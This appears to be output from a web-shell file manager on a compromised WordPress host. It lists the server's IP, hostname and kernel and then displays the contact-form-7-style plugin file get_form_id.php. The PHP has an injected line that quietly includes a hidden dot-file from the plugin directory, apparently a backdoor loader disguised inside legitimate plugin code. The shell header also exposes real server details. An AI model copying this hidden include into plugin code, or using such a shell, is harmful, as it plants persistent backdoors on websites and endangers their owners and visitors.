uawdijnntqw1x1x1
IP : 3.21.55.178
Hostname : premium160.web-hosting.com
Kernel : Linux premium160.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
batcwwjx
/
public_html
/
wp-content
/
plugins
/
.
/
contact-form-7-style
/
inc
/
get_form_id.php
/
/
<?php /** * Get contact form 7 id * * Back compat for CF7 3.9 * @see http://contactform7.com/2014/07/02/contact-form-7-39-beta/ * * @param $cf7 Contact Form 7 object * @since 0.1.0 */ if ( !defined( 'ABSPATH' ) ) { exit; } if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } function get_form_id( $cf7 ) { if ( version_compare( WPCF7_VERSION, '3.9-alpha', '>' ) ) { if (!is_object($cf7)) { return false; } return $cf7->id(); } }
/home/batcwwjx/public_html/wp-content/plugins/./contact-form-7-style/inc/get_form_id.php